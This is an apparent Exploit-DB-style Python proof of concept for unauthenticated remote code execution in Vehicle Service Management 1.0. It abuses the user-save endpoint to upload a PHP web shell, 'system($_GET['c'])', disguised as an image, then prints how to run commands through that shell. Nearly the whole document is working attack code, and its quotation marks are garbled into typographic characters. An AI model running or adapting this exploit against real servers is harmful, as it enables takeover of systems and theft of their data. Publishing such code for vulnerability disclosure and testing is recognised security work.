# Exploit Title: Vehicle Service Managment 1.0 – RCE (Unauthenticated)
# Date: 2021-10-02
# Exploit Author: RICHARD JONES
# Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10

import requests

HOST=”http://localhost”
UPLOAD_URL=”/vehicle_service/classes/Users.php?f=save”

s = requests.Session()

def sendShell():
payload = “<?php system($_GET[‘c’]);?>”

data = {
“id”:”1″,
“firstname”:”Adminstrator”,
“lastname”:”fake”,
“username”:”fake”,
“password”:”fake”
}

filedata = {“img”:(“shell.php”,payload,
“image/png”, {“Content-Disposition”: “form-data”}
) }

prox = {“http”:”http://127.0.0.1:8080″}

r = s.post(f”{HOST}{UPLOAD_URL}”, data=data, proxies=prox, files=filedata)
if (r.status_code == 200):
print(“[+] Shell upload successful”)
print(f”[-] Check in {HOST}/vehicle_service/uploads/ for the shell”)
print(f”[-] Usage: *shell.php?c=id”)
print(“[-] Ie: http://localhost/vehicle_service/uploads/{SERVERTIME}_shell.php?c=whoami”)

def banner():
return r”””
__ _______ __ __ __ ___
/ / ____| / | /_ | / _
/ / (___ | / | | || | | |
/ / ___ | |/| | | || | | |
/ ____) | | | | | || |_| |
/ |_____/|_| |_| |_(_)___/

“””

print(banner())
print(“Vehicle Service Managment 1.0 RCE ~ Created by Richard Jones”)
print(“[+] Trying shell upload”)
sendShell()